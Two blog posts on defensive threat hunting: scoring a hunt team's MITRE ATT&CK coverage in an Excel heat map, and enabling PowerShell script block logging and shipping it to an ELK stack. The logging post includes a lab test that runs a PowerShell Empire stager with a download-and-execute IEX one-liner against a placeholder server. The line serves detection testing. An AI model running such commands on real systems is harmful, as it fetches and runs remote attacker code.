Pages

Monday, July 17, 2017

How Hot Is Your Hunt Team?



The idea of Threat Hunting in an organization can no longer be dismissed. No matter how mature your organization is regarding to this concept, you might be already doing some type of hunting already. However, how do you show the effectiveness of your hunting engagements? How do you show to your senior leadership the progress of your hunt team? There is the misconception of doing it by only tracking the number of incidents uncovered during hunting campaigns. However, in my opinion, it is is also important to consider if the right data is being collected, automation is being improved, and how much the team knows about its own environment when hunting for specific adversary techniques (You can change this and create your own metrics. This is just my opinion)


In this post, I will examine the MITRE ATT&CK framework in the form of a heat map in order to measure the effectiveness of a Hunt Team. I will use Excel (VLOOKUPs formulas & Conditional Formatting features) and the MITRE ATT&CK matrix structure to show you how to build your own heat map and start measuring the effectiveness of your hunt team for free.



Heat Map Goals:


  • Provide transparency to senior leadership on threat hunting strengths and weaknesses
  • Perform a gap analysis to demonstrate where resources are needed in your environment
  • Emphasize the effectiveness of collaboration among other teams (In order to reach a very good or excellent score, you might need to work with other teams to fill the gap)
  • Prioritize techniques based on the most crucial gaps identified


MITRE ATT&CK Framework



ATT&CK is a model and framework for describing the actions an adversary takes while operating within an enterprise network. The model can be used to better characterize post compromise adversary behavior with the goal of distilling common behaviors across known intrusion activity into individual or combinations of actions that an adversary may take to achieve their goals. The TTPs described in ATT&CK were selected based on observed APT intrusions from public reporting, and are included in the model at a level of abstraction necessary for effectively prioritizing defensive investments and comparing endpoint intrusion detection capabilities. [Source]





Get your own ATT&CK Matrix in Excel




Copy the MITRE ATT&CK Matrix




  • Open Excel and create a new blank workbook
  • Go to the MITRE ATT&CK techniques page and highlight the whole Matrix table
  • Copy (CTRL + C) the highlighted table (make sure you highlight the whole table) and paste it (First cell A1 or R1C1) on your new blank workbook as shown in figure 1 and 2 below. Even though you paste it on the first row, it is pasted starting on the second one. Just delete the first row. 

Figure 1: Copying MITRE ATT&CK Matrix




Figure 2: Copying Matrix to Excel




Edit your Matrix Table


Remove Hyperlinks from the whole table at once as shown in figure 3 below. Your table might not have borders anymore so just highlight your whole table and add borders to it as shown in figures 4, 5 and 6 below.


Figure 3: Remove Hyperlinks




Figure 4: Table without Hyperlinks



Figure 5: Add "All Borders" to your table



Figure 6: Plain MITRE Matrix table



Once you have everything as a table again, you will notice that several cells have long text that needs to be wrapped into several lines to fit better. Highlight your table again and use the "Wrap Text" option as shown in figure 7 below. 


Figure 7: Wrapping up long-text




Now, the table should be ready to be used for our heat map. Add colors to your header, adjust the font size, etc. Save your document and give your worksheet a name. I named mine "HeatMap" as shown in figure 8 below.


Figure 8: Matrix Ready for our Heat Map 




UPDATE  09/10/2017: Get your own ATT&CK Matrix in Excel


  • I developed a PowerShell script that I named Invoke-ATTACKAPI which leverages the MITRE ATTACK API to interact directly with the MITRE ATTACK framework and pull valuable information all at once.
  • I use this script now to update my ATTACK Enterprise Matrix
  • All you need to do is run the following command to get the same results as above:
Invoke-ATTACKAPI -Matrix | select Persistence, 'Privilege Escalation', 'Defense Evasion','Credential Access',
Discovery, 'Lateral Movement', Execution, Collection, Exfiltration, 'Command and Control' | 
Export-Csv C:\documents\matrix.csv -NoTypeInformation



Define Your Scoring System


You need to define your scoring system and set specific criterias that you would like to use to measure how effective your team is at detecting specific adversary techniques. 

A few basic steps:
  • You can start by setting your rating system levels (None, Poor, Fair, Good, Very Good & Excellent). 
  • You can then assign a color to each score (Keep in mind you are creating a heat map). 
  • Map a number to each level (0,1,2..5) as shown in figure 9 below.
  • Finally assign key focus points for each level. One example could be what I show in figure 9 below.
As I mentioned at the beginning of this post, tracking how many incidents get uncovered during a hunting campaign should not be considered as the ONLY indicator of an effective hunt team. Why? What if you do not find anything? Does that mean that your team is not good?. In my opinion, validating the detection of a specific adversary technique by focusing on having right data, improving the automation of hunting procedures, and knowing your environment should be also considered when determining the effectiveness of a hunt team. For example, you can focus on the following key points (This is a basic example. I recommend you come up with your own ones):

  • None
    • Not enough data to detect a specific adversary technique (i.e. hunting with only Windows Security Event Logs when hunting for PowerShell activity). Also, not centralizing the amount of data needed to hunt across the whole enterprise.
  • Poor
    • Sending all your logs to a central repository. If you "hunting" on one endpoint at the time, you are NOT being effective at all ! (Consider Splunk, ELK, etc)
    • Creating basic signatures or correlation rules to detect specific activity. Usually this is done by correlating two to three events. Also, here is where you might have Threat Intel feeds helping your routine hunts (IOC Sweeps). 
    • Running queries and trying to make sense of the data without automating certain hunting procedures that could make your hunt more effective and efficient. (i.e. After running a few queries in your SIEM you might still have thousands or hundreds of events that you will still need to go through and maybe correlate them with other events to find outliers) 
  • Fair: 
    • Collecting the right data (NOT JUST MORE DATA) to improve the detection of an adversary technique. Here is where you start adding Sysmon Logs, ETW, PowerShell logs, netflow, etc). Without the right tools or processes to aggregate and make sense of all the data, your team might not be effective yet. Hunters might be running queries and still get a very high amount of events that still need to be filtered to reduce the amount of data that needs to be analyzed.
  • Good: 
    • Correlating and integrating numerous data types across all your endpoints in order to filter out noise and potential false positives. Here is where you star using a few basic Data Science techniques in order to make sense of all the data that you have in your central repository (Better Automation)
  • Very Good: 
    • Leveraging more than just simple outlier detection techniques. Here is where your team starts using advanced data science techniques to detect the known and unknown (Of course, data science concepts such as Machine Learning cannot be applied to every single use case or technique that you are trying to detect. If you can validate the detection of an adversary technique by just applying basic data science techniques, then you might be already in the "Very Good" level.
  • Excellent
    • Here is where your team is very proficient at everything above and very effective at detecting adversary techniques, but with also a very good understanding of the environment (Beyond just having the right automation and data. If you do not understand exactly how certain activity relates to your environment then you might be missing stuff).

Remember that the table below needs to be created on a new sheet in the same Workbook where you created your ATT&CK Matrix. ( I named mine "Score Defs")


Figure 9: Basic Scoring System table





Define each Adversary Technique


Set your own "All Techniques" Page


  • Go to the MITRE ATT&CK  "All Techniques" page and highlight the whole table (Same way how you did it with the matrix earlier)
  • Copy (CTRL + C) the highlighted table (make sure you highlight the whole table) and paste it (First cell A1 or R1C1) on a new sheet in the same workbook. 
  • You will basically have to do the same adjustments you did to the MITRE ATT&CK matrix (wrap-text, font size, All Borders, Remove Hyperlinks, etc).
  • Make sure you go over the whole table and adjust certain parts of the table that might have not copied properly.


Figure 10: "All Techniques" Page



Once you have a table with everything from the "All Techniques" page, then you will have to add a few columns to add more context to it and integrate it with your Heat Map. 
  • I added two columns, one named "Detection Approach" and another one named "Data Sources". In the MITRE ATT&CK "All Techniques" page, I clicked on every single technique and grabbed the Detection approach and data sources needed to help me detect the specific technique.
  • I also Added another one named "Detection Score". Here you will have to review one by one with your team and give it a score following your "Score Defs sheet" (None, Poor, Fair, Good, Very Good, Excellent).
  • Finally, I added a column named "Tools". I use this to identify what current tools would help me hunt for a specific adversary technique. This is very helpful to also show vendors how much they are contributing to your detection/hunting capabilities (Vendors selling you EDR maybe?).


Figure 11: All Techniques Table



UPDATE  09/10/2017: Define each adversary technique

  • I developed a PowerShell script that I named Invoke-ATTACKAPI which leverages the MITRE ATTACK API to interact directly with the MITRE ATTACK framework and pull valuable information all at once.
  • I use this script now to update my adversary technique sheet
  • All you need to do is run the following command to get the same results before adding 'Detection Score' And tools columns:
Invoke-ATTACKAPI -Category -Technique | select @{Name="Name"; Expression={$_.Name -join ","}}, @{Name="Tactic"; Expression={$_.Tactic -join ","}}, @{Name ="ID"; Expression={$_.ID -join ","}}, @{Name="Description"; Expression={$_.Description -join ","}}, @{Name="Analytic details"; Expression={$_.'Analytic Details' -join ","}}, @{Name="Data Source"; Expression={$_.'Data Source' -join ","}}  | export-csv F:\wardog\scripts\techniques.csv -NoTypeInformation



Set a Detection Score Drop-Down List


I added a "Detection Score" column and was able to assign a score to each technique. What if we want to change the score? Do we delete the text and type it again?. I recommend to use n Excel feature named "Data Validation" under the "Data" tab. This limits the type of data that can be entered in a cell. This will help us to have a drop-down menu to pick from the 6 different levels of the rating system.

  • Highlight all your Detection score cells, click on the tab named "Data", and on "Data Validation" as shown in figure 12 below.
  • A window will pop up where you will have to select the list of values that you will want to use as part of your drop-down menu.
  • Click inside of the "Source" box and then click on the "Score Defs" sheet. Highlight the six levels (None, Poor, Fair, Good, Very Good, Excellent) and click Okay as shown in figure 14 below.
  • You will be able to now just hover over the right edge of the cells below the "Detection Score" column and you will have 6 options as shown in figure 15 below.



Figure 12: Highlighting "Detection Score" cells




Figure 13: Selecting a Source list




Figure 14: Getting values from the Score Defs sheet




Figure 15: Drop-Down list enabled on Detection Score cells.






Integrate All the Sheets



Heat Map Sheet: Add Scoring Columns


Add a blank column to the right of each tactical group as shown in figure 16 below. There is where you will sync the score you set for each technique in the "Detailed Technique" sheet.



Figure 16: Adding extra columns to the Heat Map.





Heat Map Sheet: VLOOKUPS


If your Excel version sets your Columns to be numbers instead of being letters, then you have the R1C1 reference style option enabled by default. If you are not comfortable with the R1C1 Reference style of your table, then you need to disable that feature by going to File> Option > Formulas ,un-check R1C1 reference style feature and click OK as shown in figure 17 below. 



Figure 17: Disable R1C1 Reference Style




Now you should be good to start setting your VLOOKUP formulas. First, Highlight the first cell next to the first Persistence technique ("Accessibility Features").

Copy the text below into the Formula bar as shown in figure 17:

=VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!A:G,7,0),'Score Defs'!A:B,2,0)

  • A2 is the cell to the left of the cell you highlighted (The Adversary Technique). That's the value we are going to be looking for first.
  • ''Detailed Techniques'!A:G,7,0)
    • The first value in quotes is the name of the Sheet where you will look value in cell A2.
    • !AG: Table Range
    • The second value after the comma (7) is the "Detection Score" column number where we will collect the score value for the specific adversary technique that we were looking for (A2 = Accessibility Features)
    • The last value after the last comma (0) and before the ")" is basically saying "Match the exact value" that I am looking for (not fuzzy matching). 
  • 'Score Defs'!A:B,2,0)
    • The first value in quotes again is just pointing to the "Score Defs" sheet where you will now look for the Score string retrieved from the "Detailed Technique" sheet.
    • The second value after the first comma (2) is the "Integer Mapping" column number where we will collect the value (number) in relation to the specific score level (None, Poor, Fair, Good, Very Good or Excellent).
    • The last value after the last comma (0) and before the ")" is basically saying "Match the exact value" that I am looking for (not fuzzy matching). 

As you can see below, after entering the formula from above, I got a value of Zero which means that I set the score for Accessibility Features to be "NONE" ( Not data available for that technique)



Figure 18: Double VLOOKUP to get a score value for each technique




Now in order to test your formula with other techniques in the same column, select the cell with the number "0" and drag the bottom right corner of the cell down to apply the same formula to all the columns below as you can see in figure 19 below. 


Figure 19: Double VLOOKUP to get a score value for each technique




There will be cells that will be just blank, and in order to not get any error messages, we just have to add a conditional to the formula. Replace the first formula with the following:

=IF(ISNA(VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!A:G,7,0),'Score Defs'!A:B,2,0)),"",VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!A:G,7,0),'Score Defs'!A:B,2,0))



Figure 20: Double VLOOKUP with IF conditional to show empty cells where there are not techniques.





Heat Map: Locking Cell Values in Formula


Next, we have to copy the same formulas to the other columns and we want to make sure that our table ranges from our "Score Defs" and "Detailed Techniques" stay the same. The only value that should change is value of the first cell to the right of each technique. You can lock parts of your formula by doing the following:

  • Click on the first cell where you created the firs formula (B2)
  • Place your cursor on the Table Range of each sheet and press F4
  • You will see the table range values with Dollar Signs next to their parameters as shown in figure 21 below.



Figure 21: Lock cell values



Then, copy the first cell to the right of "Accessibility Features" under persistence, and paste it at the beginning of each column to the right of each technique. Then, drag the bottom right corner of each cell with the formula down until the last technique of each column as shown in figure 22 below. You will see that every single technique now has a value associated to its rate level.



Figure 22: All the values from the Detailed techniques and Score Defs are synced





Add Colors to your Heat Map


Get your RGB Color Values


First get the RGB values of all your rate levels. You can do that by going to your "Score Defs", clicking on the rate cell and checking its "More colors" settings of the fill color as shown in figure 23 below. Do the same for every single color. Let me share my RGB values just in case you like mine:

0 = RGB 255 79 79
1 = RGB 255 119 87
2 = RGB 255 174 93
3 = RGB 242 245 123
4 = RGB 209 220 255

5 = RGB 125 156 255



Figure 23:  RGB Value of Poor/1.





Conditional Formatting: Creating Rules


Once you have all your RGB values written down, go to your "HeatMap"  sheet and highlight the whole table. Do the following:

  • Click on Conditional Formatting > New Rule as shown in figure 24 below
  • Select "Use a formula to determine which cells to format"  (Figure 25)
  • In the "Format values where this formula is true", type: =B2=1  (Figure 26)
  • Click on Format > More Colors> and set the RGB value for the Rate Poor=1.
  • Click OK> OK > OK (Figure 27)
  • You should now see all the techniques where the effectiveness of the Hunt team was set to 1 as orange as shown in figure 28




Figure 24:  Creating a new rule.




Figure 25:  Setting the rule type.




Figure 26:  Set the values where the formula is true.




Figure 27:  Setting the RGB value..





Figure 28:  Poor values.




Next, create the rest of the rules for the rate values of 2, 3, 4 , 5, 0 and "" (BLANK) Yes you have to create a BLANK rule at the end. Make the "" rule your last rule and set it to "No color" (The rule should show up as the first top rule). That rule should look like something like this: =B2="" .

Once you have all the rules in place, your heat map should look like this:



Figure 29:  Your First Heat Map.





Bonus: Effectiveness Trend


You can add up all the values per tactical group, get the average number and show a chart with a summary of how effective your hunt team is per tactical group and per quarter. (Your Boss will love this)



Figure 30: Effectiveness Trend Over Time.





Test your Heat Map: Take Care of the Basics


Lets say you start sending all your native windows event logs to a central repository and start collecting Sysmon logs too. You will see techniques going from None to Poor or Fair (This is just an example). Remember that even though we might have some extra visibility, you still would have to go through a lot of data and analyze several events if you do not improve the automation of certain hunting procedures. Several adversary techniques require more than just a simple correlation rule or signature. Also, we are measuring the effectiveness of the Hunt Team and not just how many incidents get uncovered during the hunting campaign.



Figure 31: Heat Map update





Final Thoughts


I hope this was very helpful for those Hunt Teams that would like to give themselves an idea of how effective their hunt team is. This is one of many ways that you can put metrics towards your hunting campaigns. 

For those that would like to just download the template and start using it right away, you can find it in the metrics folder of the ThreatHunter-Playbook

URLhttps://github.com/Cyb3rWard0g/ThreatHunter-Playbook/blob/master/metrics/HuntTeam_HeatMap.xlsx 


if you would like to contribute to the ThreatHunter-Playbook, just send a PR ! 



Feedback is greatly appreciated! Thank you.


Wednesday, June 28, 2017

Enabling Enhanced PowerShell logging & Shipping Logs to an ELK Stack for Threat Hunting


A couple of weeks ago, I was asked how useful enabling enhanced PowerShell logging is for a Threat Hunter and how easy it is to ship its logs to an ELK stack for analysis. First, when I say enhanced PowerShell logging, I mean enabling Module & Script Block Logging. Those two enhancements started with Windows Management Framework (WMF) version 4.0 and 5.0 and are very useful to log PowerShell pipeline execution details and all blocks of PowerShell code as they get executed (Helpful against encoded and obfuscated scripts). Several experts have already explained the benefits of those enhancements in more details, but only a few have shown detailed steps for the implementation, consumption and analysis of the logs.

In this post, I will show you how you can enable enhanced PowerShell logging in your lab environment, create a Logstash Filter for it, and integrate it with other logs to improve your endpoint visibility while hunting for adversaries leveraging PowerShell (not just powershell.exe) during post-exploitation. 



Requirements:





PowerShell 5.0 (WMF 5.0 RTM) Installation


Install the latest Windows updates before installing WMF 5.0 RTM. You can install WMF 5.0 RTM only on the following operating systems:[Source]


OS
Editions
Prerequisites
Package Links
Windows Server 2012 R2


Windows Server 2012


Windows Server 2008 R2 SP1
All, except IA64
WMF 4.0 and .NET Framework 4.5 or above are installed
Windows 8.1
Pro, Enterprise

Windows 7 SP1
All
WMF 4.0 and .NET Framework 4.5 or above are installed




To install WMF 5.0 from Windows Explorer (or File Explorer): [Source]


  1. Navigate to the folder into which you downloaded the MSU file.
  2. Double-click the MSU to run it.

To install WMF 5.0 from Command Prompt: [Source]


  1. After downloading the correct package for your computer's architecture, open a Command Prompt window with elevated user rights (Run as Administrator). On the Server Core installation options of Windows Server 2012 R2 or Windows Server 2012 or Windows Server 2008 R2 SP1, Command Prompt opens with elevated user rights by default.
  2. Change directories to the folder into which you have downloaded or copied the WMF 5.0 installation package.
  3. Run one of the following commands:
    • On computers that are running Windows Server 2012 R2 or Windows 8.1 x64, run Win8.1AndW2K12R2-KB3134758-x64.msu /quiet.
    • On computers that are running Windows Server 2012, run W2K12-KB3134759-x64.msu /quiet.
    • On computers that are running Windows Server 2008 R2 SP1 or Windows 7 SP1 x64, run Win7AndW2K8R2-KB3134760-x64.msu /quiet.
    • On computers that are running Windows 8.1 x86, run Win8.1-KB3134758-x86.msu /quiet.
    • On computers that are running Windows 7 SP1 x86, run Win7-KB3134760-x86.msu /quiet.




Script Block Logging


PowerShell v5 and KB 3000850 introduces deep script block logging. When you enable script block logging, PowerShell records the content of all script blocks that it processes. If a script block uses dynamic code generation (i.e.: $command = "’Hello World’"; Invoke-Expression $command), PowerShell will log the invocation of this generated script block as well. This provides complete insight into the script-based activity on a system – including scripts or applications that leverage dynamic code generation in an attempt to evade detection. [Source] Script Block logging events are written to Event ID (EID) 4104



Module Logging


Module logging records pipeline execution details as PowerShell executes, including variable initialization and command invocations. Module logging will record portions of scripts, some de-obfuscated code, and some data formatted for output. This logging will capture some details missed by other PowerShell logging sources, though it may not reliably capture the commands executed. Module logging has been available since PowerShell 3.0. Module logging events are written to Event ID (EID) 4103. [Source]



Turn On Enhanced PS Logging Via GPO Settings


Create & Edit a New GPO


If you have a domain controller set up in your environment with AD services enabled, you can create Audit Policies and apply them to your whole domain. If you don't know how to create a custom Audit Policy in your environment, you can learn about it from one of my posts here starting on "Figure 59. Creating a new GPO" to get familiar with GPOs. Create an edit a GPO by doing the following as shown in figures 1-4 below:



Figure 1: Creating new GPO


Figure 2: Naming GPO



Figure 3: GPO created



Figure 4: Edit new GPO




Browse to "Windows PowerShell" Settings


In Group Policy Management Editor, browse to Computer configuration > Administrative Templates: Policy Definitions > Windows Components > Windows PowerShell as shown in figures 5-6 below


Figure 5: Browsing to Windows PowerShell settings



Figure 6: Browsing to Windows PowerShell settings




Turn On Module Logging


  • Right click on "Turn on Module Logging", select Edit,  and check the "Enabled" option
  • Once you select enabled, the "Show" options next to "Modules Names" will be available.
  • Click on "Show" and a Show Content window will pop up
  • Click on value and add an "*" in order to log all PowerShell modules
  • Click OK on the "Show Content Window" to exit out of it
  • Click Apply and OK


Figure 7: Turning on Module Logging



Figure 8: Turning on Module Logging



Figure 9: Turning on Module Logging



Figure 10: Turning on Module Logging



Figure 11: Setting * as a value to log all PowerShell modules




Turn on Script Block Logging


  • Right click on "Turn on PowerShell Script Block Logging" and select Edit
  • Check the "Enabled" option
  • [optional] Check "log script invocation start/stop" options
  • Click on Apply and OK

Figure 12: Turning on Script Block Logging



Figure 13: Turning on Script Block Logging



Figure 14: Enhanced PowerShell logging with Module and Script Block logging enabled




Link new existing GPO


  • Go back to your Group Policy Management and right click on your Domain name
  • Select Link an Existing GPO
  • Select your PowerShell one and click OK


Figure 15: Linking new GPO to Domain



Figure 16: Linking new GPO to Domain



Figure 17: Linking new GPO to Domain




Force Group Policy updates on your victim VMs



Figure 18: Forcing GP updates





Testing Enhanced PowerShell


Run a simple PowerShell Command


Open PowerShell and type the following:

(new-object System.Net.WebClient).DownloadString("https://cyberwardog.blogspot.com", "test.txt")

Check your events in Event Viewer and you should be able to get, for example, a 4103 event showing you the module that was used in your basic command (System.net.Webclient)


Figure 19: Testing PowerShell logging



Figure 20: Testing PowerShell logging




Ship PowerShell logs to your ELK


Up to this point, we can tell that our enhanced PS logging works. Now, it is time to ship the logs to our central repository (ELK Stack). If you have not set up your ELK stack yet, I would recommend to follow the following steps posted here. If you have not set up your Log Shipper yet either, you can learn how to do it following the steps posted here (Starting on Figure 9). Once you have all that set up, just open your "Winlogbeat" configuration as Administrator with Notepad and add the following under your Winlogbeat.event_logs section as shown in figure 21:

- name: Microsoft-Windows-PowerShell/Operational
  event_id: 4103, 4104

Save your changes and restart your Winlogbeat service. (I have my Winlogebat config sending also Sysmon logs. if you do not have Sysmon installed do not add that to your config)


Figure 21: Adding PowerShell logs to your Winlogbeat config




Why do we need a Logstash Filter?


We can tell that our enhanced PS logging works, and we were good to start sending our logs to a central repository (ELK Stack). However, if we take a look at how the data is shipped to our ELK specially EID 4103, you can see that our event data is split in two fields [event_data][Payload] and [event_data][ContextInfo] as shown in figure 22 below.

Now, [event_data][Payload] should give us our modules information, but Payload has everything as a long string which is then stored as a long string in elasticsearch without creating extra fields. Json representation as shown in figure 22 shows what I am talking about.


Figure 22: EID 4103 JSON




Creating a Logstash Filter [UPDATED]


UPDATE 07/06/2017
Thank you to Nate Guagenti @neu5ron , the initial filter configuration went from a basic/simple one to a more advanced config. Thank you very much for your help Nate!!

Log on to your ELK server and type the following:

sudo nano /etc/logstash/conf.d/10-powershell-filter.conf

The command above should create a new logstash filter. You can name it whatever you want. Then, copy and paste the following:


filter {
  if [source_name] == "Microsoft-Windows-PowerShell" {
    if [event_id] == 4103 {
      mutate {
        add_field => [ "PayloadInvocation", "%{[event_data][Payload]}" ]
add_field => [ "PayloadParams", "%{[event_data][Payload]}" ]
gsub => [
 "[event_data][ContextInfo]", "      ", "",
 "[event_data][ContextInfo]", " = ", "="
]
      }
      mutate {
        gsub => [
 "PayloadInvocation", "CommandInvocation\(.*\)", "commandinvocation",
 "PayloadInvocation", "ParameterBinding.*\r\n", "",
 "PayloadParams", "parameterbinding\(.*\)", "parameterbinding",
 "PayloadParams", "CommandInvocation.*\r\n", "",
 "[event_data][Payload]", "CommandInvocation.*\r\n", "",
 "[event_data][Payload]", "ParameterBinding.*\r\n", ""
]
        rename => { "[event_load][Payload]" => "[powershell][payload]" }
      }     
      kv {
        source => "PayloadInvocation"
        field_split => "\n"
        value_split => ":"
        allow_duplicate_values => false
        target => "[powershell]"
        include_keys => [ "commandinvocation" ]
      }
      kv {
        source => "PayloadParams"
        value_split => "="
        allow_duplicate_values => false
        target => "[powershell][param]"
        include_keys => [ "name", "value" ]
      }
      kv {
        source => "[event_data][ContextInfo]"
        field_split => "\r\n"
        value_split => "="
        remove_char_key => " "
        allow_duplicate_values => false
        include_keys => [ "Severity", "HostName", "HostVersion", "HostID", "HostApplication", "EngineVersion", "RunspaceID", "PipelineID", "CommandName", "CommandType", "ScriptName", "CommandPath", "SequenceNumber", "ConnectedUser", "ShellID" ]
      }
      mutate {
        rename => { "CommandName" => "[powershell][command][name]" } 
        rename => { "CommandPath" => "[powershell][command][path]" }
        rename => { "CommandType" => "[powershell][command][type]" }
        rename => { "ConnectedUser" => "[powershell][connected][user]" }
        rename => { "EngineVersion" => "[powershell][engine][version]" }
        rename => { "HostApplication" => "[powershell][host][application]" }
        rename => { "HostID" => "[powershell][host][id]" }
        rename => { "HostName" => "[powershell][host][name]" }
        rename => { "HostVersion" => "[powershell][host][version]" }
        rename => { "PipelineID" => "[powershell][pipeline][id]" }
        rename => { "RunspaceID" => "[powershell][runspace][id]" }
        rename => { "Scriptname" => "[powershell][scriptname]" }
        rename => { "SequenceNumber" => "[powershell][sequence][number]" }
        rename => { "ShellID" => "[powershell][shell][id]" }
        remove_field => [
          "Severity",
          "EventType",
          "Keywords",
          "message",
          "Opcode",
          "PayloadInvocation",
          "PayloadParams",
          "[event_data][Payload]",
          "[event_data][ContextInfo]"
        ]
        convert => { "[powershell][pipeline][id]" => "integer" }
        convert => { "[powershell][sequence][number]" => "integer" }
      }
    }
    if [event_id] == 4104 {
      mutate {
        rename => { "[event_data][MessageNumber]" => "[powershell][message][number]" }
        rename => { "[event_data][MessageTotal]" => "[powershell][message][total]" }
        rename => { "[event_data][ScriptBlockId]" => "[powershell][scriptblock][id]" }
        rename => { "[event_data][ScriptBlockText]" => "[powershell][scriptblock][text]" }
        remove_field => [ "message" ]
        convert => { "[powershell][message][number]" => "integer" }
        convert => { "[powershell][message][total]" => "integer" }
        convert => { "[powershell][scriptblock][id]" => "integer" }
        
      }    
    }
  }
}

You can also find this PowerShell config here

Figure 23: Part of the Logstash PowerShell Filter



Restart your logstash service as shown in figure 24 below. Make sure you monitor your Logstash logs to make sure everything runs smoothly. If you encounter an error, check your configuration and restart your logstash service.


Figure 24: Restart Logstash service




Visualize Logstash Changes


Browse to your Kibana IP and if you repeat the basic command you executed to test your PS logging, you should now be able to see tree new extra fields that you can add as columns when visualizing your 4103 logs.


Figure 25: Visualize Logstash changes




If you notice the fields related to your PowerShell logs (even with your new custom fields) have a "?" to the left of the field name and a yellow triangle as shown in figure 26 below, That is because you need to refresh your fields lists in your ELK stack. Go to Management and refresh your field list as shown in figure 27-28 below.


Figure 26: Visualize Logstash changes




Figure 27: Refresh Field list




Figure 28: Refresh Field list




Figure 29: Refresh Field list





TimeLine View


You should be able to now see how useful having the data parsed properly is when you put the events in a timeline view as shown in figure 30 below.


Figure 30: Timeline style




PS Logging as part of a 360 view (Dashboard)


You could also add the custom fields and the enhanced PS logging fields to a dashboard to improve your 360 view of your environment. This is very useful to monitor PowerShell activity in your environment in a more detailed perspective.


Figure 31: 360 view of your environment with PS Logging implemented




Ready to test a PS Empire Stager?


Listener and Stager Ready



Figure 32: Listener Ready



Figure 32: Stager Ready




Start a Pythonic Web server hosting your stager script



Figure 33: Web server ready.




Download & Execute Stager


Go to your victim's computer, and open PowerShell. Type the command below:

IEX (New-Object System.Net.WebClient).DownloadString("http://<Your Web Server>:<port>/<stager script>"); .\<stager script>


Figure 34: Downloading and executing stager




Take a look at your Dashboard


Right away if you look at the top-right of you dashboard you will start seeing some interesting events (command invocation, param values, and ScriptblockText). Make sure you add a filter to only look at logs from the victim's computer


Figure 35: Dashboard view after execution of stager




TimeLine View


You can see that the Script Block Text field captured the initial command used to download and execute the stager. Remember the column names so that you can follow several of the images below that I could not show the column headers.


Figure 36: First ScriptBlockText even




Then, I can see the Command "new-object" being invoked and "System.Net.WebClient" being used


Figure 37: First 4103 event




Also, pay attention to the combination of events in picture 38 below. You can see Windows event 4688 (Process Creation), 4104 (Script block Script) & Sysmon EID 1 (Process Creation). This is the ONLY  time that you will see all those events capturing the initial execution of the stager in the victim's computer. Starting from here, nothing gets executed on disk for which you will not have 4688's neither Sysmon EID 1's tracking the rest of the script/commands being executed on the victim's computer. However, you will start seeing 4103 & 4014 capturing the rest of the PowerShell activity.


Figure 38: Capturing initial execution of stager




Now, you might be asking yourself why the Script Block text field has encoded strings and not showing them as decoded strings? Take a look at figure 39 & 40 below. Script Block logging captures both states.


Figure 39: Decoded Stage



Figure 40: Decoded Stage




More indicators.....


Figure 41: More indicators



We can see information being gathered from the system via WMI as shown in figure 42 below.. 


Figure 42: WMI to gather information about the compromised system




Finally, our Beaconing pattern from a host perspective :) Very useful!


Figure 43: Beaconing pattern from a powershell perspective





Final Thoughts


I hope this post was helpful to those that were not that familiar with the benefits of enhanced PowerShell logging and with the process of implementing this in your environment. In my next posts, I will be using this same approach and new logging capabilities in order to document patterns and events that get created by several post-exploitation techniques available in PowerShell Empire.

If you would like to contribute and document adversaries patterns/behaviors captured by event logs (Windows, Sysmon, PowerShell , etc), feel free to follow the Template and submit a PR to the 

ThreatHunter-Playbook (A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.)


 Feedback is greatly appreciated! Thank you.